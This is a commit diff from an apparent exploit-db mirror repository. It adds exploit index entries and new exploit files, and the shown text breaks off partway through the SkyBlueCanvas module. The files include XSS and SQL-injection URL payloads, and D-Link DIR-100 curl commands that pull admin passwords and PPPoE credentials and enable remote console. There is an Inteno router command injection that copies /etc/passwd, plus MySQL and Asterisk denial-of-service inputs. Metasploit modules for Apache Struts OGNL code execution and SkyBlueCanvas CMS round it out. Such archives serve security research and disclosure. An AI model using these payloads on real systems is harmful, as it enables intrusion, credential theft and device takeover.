bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_07_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-07 04:27:24 +00:00
parent 8fb3dea0ad
commit 9f14dc1cba
40 changed files with 2159 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

43
files.csv
View file

@ -25732,7 +25732,7 @@ id,file,description,date,author,platform,type,port
28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0
28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability",2006-09-27,rUnViRuS,php,webapps,0
28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.PHP Cross-Site Scripting Vulnerability",2006-09-27,HanowarS,php,webapps,0
28718,platforms/freebsd/local/28718.c,"FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0
28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit",2013-10-04,CurcolHekerLink,freebsd,local,0
28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0
28720,platforms/php/webapps/28720.txt,"Web//News 1.4 Parser.PHP Remote File Include Vulnerability",2006-09-27,ThE-WoLf-KsA,php,webapps,0
28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 index.php Unspecified XSS",2006-09-22,"Armorize Technologies",php,webapps,0
@ -28142,7 +28142,7 @@ id,file,description,date,author,platform,type,port
31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0 .57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)",2014-02-01,@u0x,multiple,webapps,0
31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0
31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0
31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0
@ -28219,3 +28219,42 @@ id,file,description,date,author,platform,type,port
31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component 'category' Parameter SQL Injection Vulnerability",2008-03-17,The-0utl4w,php,webapps,0
31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability",2008-03-17,quentin.berdugo,cgi,webapps,0
31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 Wiki Server Directory Traversal Vulnerability",2008-03-17,"Rodrigo Carvalho",osx,remote,0
31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 Cross-Site Scripting Vulnerability",2008-03-17,Berezniski,asp,webapps,0
31414,platforms/php/webapps/31414.txt,"phpstats 0.1_alpha 'phpstats.php' Cross-Site Scripting Vulnerability",2008-03-18,"Hanno Boeck",php,webapps,0
31415,platforms/php/webapps/31415.txt,"eForum 0.4 'busca.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0
31416,platforms/php/webapps/31416.txt,"webSPELL 4.1.2 'index.php' Cross-Site Scripting Vulnerability",2008-03-18,n3w7u,php,webapps,0
31418,platforms/php/webapps/31418.txt,"Job Site 1.0 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80
31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 (.asf) - Crash PoC",2014-02-05,Saif,multiple,dos,0
31430,platforms/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80
31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80
31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS Remote Code Execution",2014-02-05,metasploit,linux,remote,0
31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager Application Upload Authenticated Code Execution",2014-02-05,metasploit,multiple,remote,80
31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,metasploit,java,remote,8080
31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80
31436,platforms/php/webapps/31436.txt,"Pandora FMS 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80
31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0
31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 List Directories and Folders Information Disclosure Vulnerability",2008-03-18,Linux_Drox,php,webapps,0
31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0
31441,platforms/php/webapps/31441.txt,"MyBlog 1.x SQL Injection and Remote File Include Vulnerabilities",2008-03-19,Cod3rZ,php,webapps,0
31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 'links.asp' SQL Injection Vulnerability",2008-03-19,xcorpitx,asp,webapps,0
31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 'index.php' Cross-Site Scripting Vulnerability",2008-03-19,sasquatch,php,webapps,0
31444,platforms/linux/dos/31444.txt,"MySQL <= 5.1.13 INFORMATION_SCHEMA Remote Denial Of Service Vulnerability",2007-12-05,"Masaaki HIROSE",linux,dos,0
31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 manager/getImportFileRedirect.jsp file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 manager/fileManager.jsp dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta 'print.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0
31448,platforms/php/webapps/31448.txt,"Joomla! and Mambo Datsogallery 1.3.1 Component 'id' Parameter SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0
31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 delete_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 delete_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 edit_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/31413.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28279/info
Imperva SecureSphere is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imperva SecureSphere 5.0 MX Management Server is vulnerable.
http://www.example.con/%20<script>alert(window.location=(window.location+"a").slice(0,48)+"view=activateSettingObj&popUpViewRequest=activatePopup&view_func=frameset&view_module=activate_setting");</script>/*.aspx

7
platforms/asp/webapps/31442.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28315/info
PortalApp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users

198
platforms/hardware/webapps/31425.txt Executable file
View file

@ -0,0 +1,198 @@
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-09-19
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery: CVE-2013-7053
* CWE-79 Cross-Site Scripting: CVE-2013-7054
* CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
# Table of Contents
1. Background
2. Vulnerability Description
3. Technical Description
4. Severity and Remediation
5. Timeline
# 1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.
# 2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to
authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and
password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race
condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary
commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim
accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
# 3 Technical Description of the Vulnerabilities
## 3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
## 3.1 Authentication Bypass
### Description
The administrator password is not protected in any way on the device, every
attacker with access to the administrator interface which listens on port 80.
For retrieving the Administrator password the request must not be
authenticated.
### Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator
password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
## 3.2 Weak Authentication
### Description
As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
### Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
## 3.3 Retrieve sensitive information
### Description
Besides retrieving the administrator password without authentication it is
possible to retrieve other sensitive configuration from the device as well like
the PPTP and poe Username and Password, as well as the configured dyndns
username and password and configured mail log credentials when these parameters
are configured.
No authentication is requred.
### Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
## 3.4 Cross-Site Request Forgery (CSRF)
### Description
CSRF attacks can be launched by sending a formatted request to a victim, then
tricking the victim into loading the request (often automatically), which
makes it appear that the request came from the victim. As an example the
attacker could change the administrator password (see Proof of Concept code)
and enable system remote access.
### Proof of Concept
Changing the password for administrator can be done when the ip-address is
authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
## 3.5 Cross-Site Scripting (XSS)
### Description
It is possible for an authenticated user to store information on the server
which will not be checked on the server side for special characters which
results in persistent Cross-Site Scripting Vulnerabilities. With this
vulnerabilty the victim (administrator) will run javascript code in the
context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is
filtered and validated, sending data directly to the CGI scripts.
### Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
# 4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
# 5 Timeline
2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report

110
platforms/hardware/webapps/31430.txt Executable file
View file

@ -0,0 +1,110 @@
1. Background
According to the vendor, Inteno DG301 is a high-end Multi-WAN
residential gateway with advanced router and bridge functions.
2. Summary
Inteno DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6 is vulnerable to command injection, which can be exploited
directly from the login form on the web interface.
The vulnerability could be exploited by unauthenticated attackers.
Successful exploitation would allow attackers to execute arbitrary
commands with root privileges.
3. Affected Products
DG301 Powered by LuCI Trunk (inteno-1.0.34) and OpenWrt Backfire
10.03.1-RC6.
Other products or previous versions may also be vulnerable.
4. Vulnerability and Proof of Concept (PoC)
The login form presented on the web administration interface (username
parameter) is vulnerable to command injection, due to the application
does not validate the user input in a proper manner.
The following PoC includes a POST request that should be sent to the
device via web. The request includes a command that will copy the
contents of "/etc/passwd" to a file "test.txt" on the root web folder
were the web administration interface is published.
POST /cgi-bin/luci HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sysauth=55f19d843ebf2de094b8a8a2acf5c3a7; sysauth=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
username=user`cp%20/etc/passwd%20/www/test.txt`&password=pass
After the request is sent, proceed to visit http://<routerIP>/test.txt.
This should display the contents of "/etc/passwd", including the root
password in encrypted (DES) form. From here, the root credentials could
be cracked in a reasonable amount of time. This attack could also be
used for enabling services (e.g. SSH), or running any other arbitrary
commands.
5. Remediation
The vendor has released a new firmware version - 1.6.8RC3.
Users are encouraged to update their devices in order to patch the
vulnerability.
6. Credit
The vulnerability was originally discovered in an Inteno DG301 device,
by Juan J. Güelfo at Encripto AS.
E-mail: post@encripto.no
Web: http://www.encripto.no
For more information about Encripto's research policy, please visit
http://www.encripto.no/forskning/
7. Timeline
24th of January 2014 - Vulnerabilities discovered by the researcher.
26th of January 2014 - Vulnerability details disclosed to the vendor.
31st of January 2013 - New firmware version launched by the vendor,
which addresses the vulnerability.
3rd of February 2014 - Public disclosure.
8. References
http://www.encripto.no/forskning/whitepapers/Inteno_DG301_advisory_feb_2014.pdf
DISCLAIMER
The material presented in this document is for educational purposes
only. Encripto AS cannot be
responsible for any loss or damage carried out by any technique
presented in this material. The reader is
the only one responsible for applying this knowledge, which is at his /
her own risk.
Any of the trademarks, service marks, collective marks, design rights,
personality rights or similar rights
that are mentioned, used or cited in this document is property of their
respective owners.
Kind regards
*Juan J. Guelfo*
Encripto AS - Information Security
Mailbox 2017, 6028 Aalesund, Norway.
Phone: +47 912 40 380 | www.encripto.no <http://www.encripto.no>

142
platforms/java/remote/31434.rb Executable file
View file

@ -0,0 +1,142 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Developer Mode OGNL Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache
Struts 2. The problem exists on applications running in developer mode,
where the DebuggingInterceptor allows evaluation and execution of OGNL
expressions, which allows remote attackers to execute arbitrary Java
code. This module has been tested successfully in Struts 2.3.16, Tomcat
7 and Ubuntu 10.04.
},
'Author' =>
[
'Johannes Dahse', # Vulnerability discovery and PoC
'Andreas Nusser', # Vulnerability discovery and PoC
'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-0394'],
[ 'OSVDB', '78276'],
[ 'EDB', '18329'],
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],
[ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Struts 2', { } ]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def check
vprint_status("Testing to see if the target can evaluate our Java code...")
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})")
if res and res.code == 200 and res.body.to_i == sum
return Exploit::CheckCode::Vulnerable
end
if res and res.code == 200 and res.body.to_s =~ /#{sum}/
vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:")
vprint_line(res.body.to_s)
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
def exploit
@payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar"
upload_jar
execute_jar
end
def upload_jar
append = 'false'
jar = payload.encoded_jar.pack
chunk_length = 384 # 512 bytes when base64 encoded
while(jar.length > chunk_length)
java_upload_part(jar[0, chunk_length], @payload_jar, append)
jar = jar[chunk_length, jar.length - chunk_length]
append='true'
end
java_upload_part(jar, @payload_jar, append)
end
def java_upload_part(part, filename, append = 'false')
cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
def execute_jar
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def execute_command(cmd)
injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD"
injection.gsub!(/CMD/, cmd)
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'method' => 'GET',
'vars_get' =>
{
'debug' => 'command',
'expression' => injection
}
})
return res
end
end

9
platforms/java/webapps/31438.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28296/info
IBM Rational ClearQuest is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input.
An attacker could exploit these vulnerabilities to execute arbitrary local or remote script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Ration ClearQuest 2003.06.16, 7.0.0.1, 7.0.0.2, 7.0.1.0, and 7.0.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');// http://www.example.com/cqweb/login?targetUrl=/cqweb/main?command=GenerateMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.example.com/cqweb/login&username=test</script><script>alert('xss')</script>&password=test&schema=SCHEMAHERE&userDb=DBHERE

17
platforms/jsp/webapps/31445.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/28352/info
Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
These issues include:
- A local file-include vulnerability.
- An arbitrary file-upload vulnerability.
- A directory-traversal vulnerability.
Note that attackers must be logged into the application to exploit issues.
Exploiting these issues can allow attackers to access potentially sensitive information or to execute arbitrary script code in the context of the webserver process. Other attacks may also be possible.
Elastic Path 4.1 and 4.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/elasticpath_dir/manager/getImportFileRedirect.jsp?type=mapping&file=../../../../../boot.ini

17
platforms/jsp/webapps/31446.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/28352/info
Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
These issues include:
- A local file-include vulnerability.
- An arbitrary file-upload vulnerability.
- A directory-traversal vulnerability.
Note that attackers must be logged into the application to exploit issues.
Exploiting these issues can allow attackers to access potentially sensitive information or to execute arbitrary script code in the context of the webserver process. Other attacks may also be possible.
Elastic Path 4.1 and 4.1.1 are vulnerable; other versions may also be affected.
http://www.example.com/elasticpath_dir/manager/fileManager.jsp?dir=../../../../WINDOWS/system32/config/

38
platforms/linux/dos/31440.txt Executable file
View file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/28308/info
Asterisk is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data before copying it to insufficiently sized buffers.
Exploiting these issues may allow an attacker to corrupt memory and cause denial-of-service conditions or potentially execute arbitrary code in the context of the application.
These issues affect the following versions:
Asterisk Open Source prior to 1.4.18.1 and 1.4.19-rc3.
Asterisk Open Source prior to 1.6.0-beta6
Asterisk Business Edition prior to C.1.6.1
AsteriskNOW prior to 1.0.2
Asterisk Appliance Developer Kit prior to Asterisk 1.4 revision 109386
s800i (Asterisk Appliance) prior to 1.1.0.2
Example invalid SDP payload (invalid RTP payload type is 780903144):
v=0
o=- 817933771 817933775 IN IP4 10.10.1.101
s=session-name
c=IN IP4 10.10.1.101
t=0 0
m=audio 5000 RTP/AVP 0
a=rtpmap:780903144 PCMU/8000
a=rtpmap:4 G723/8000/1
a=rtpmap:97 telephone-event/8000
Example SDP payload:
v=0
o=- 817933771 817933775 IN IP4 10.10.1.101
s=session-name
c=IN IP4 10.10.1.101
t=0 0
m=audio 5000 RTP/AVP 0
a=rtpmap:0 PCMU/8000
[... repeat this line ...]
a=rtpmap:4 G723/8000/1
a=rtpmap:97 telephone-event/8000

24
platforms/linux/dos/31444.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/28351/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be done through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
This issue affects versions prior to MySQL 5.0.32 and 5.1.14.
1.
REATE OR REPLACE VIEW test_view AS
SELECT
table_schema AS object_schema
,table_name AS object_name
,table_type AS object_type
FROM information_schema.tables
ORDER BY object_schema;
EXPLAIN SELECT * FROM test_view;
2.
explain select * from (select table_name from information_schema.tables ) AS a;

94
platforms/linux/remote/31432.rb Executable file
View file

@ -0,0 +1,94 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'SkyBlueCanvas CMS Remote Code Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability
in SkyBlueCanvas CMS version 1.1 r248-03 and below.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Scott Parish', # Vulnerability discovery and exploit
'xistence <xistence[at]0x90.nl>' # Metasploit Module
],
'References' =>
[
['CVE', '2014-1683'],
['OSVDB', '102586'],
['BID', '65129'],
['EDB', '31183'],
['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html']
],
'Privileged' => false,
'Payload' =>
{
# Arbitrary big number. The payload gets sent as an HTTP
# response body, so really it's unlimited
'Space' => 262144, # 256k
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python'
}
},
'Platform' => %w{ unix },
'Targets' =>
[
['SkyBlueCanvas 1.1 r248', {}]
],
'Arch' => ARCH_CMD,
'DisclosureDate' => 'Jan 28 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
],self.class)
end
def check
uri = normalize_uri(target_uri.path.to_s, "index.php")
res = send_request_raw('uri' => uri)
if res and res.body =~ /[1.1 r248]/
vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found")
